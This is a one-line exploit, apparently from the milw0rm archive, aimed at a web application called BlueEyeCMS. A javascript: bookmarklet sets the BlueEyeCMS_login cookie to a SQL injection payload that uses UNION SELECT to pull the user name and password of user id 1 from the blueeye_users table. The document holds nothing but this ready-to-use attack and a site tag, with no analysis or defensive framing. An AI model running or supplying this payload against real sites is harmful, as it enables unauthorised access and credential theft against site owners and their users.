javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";

# milw0rm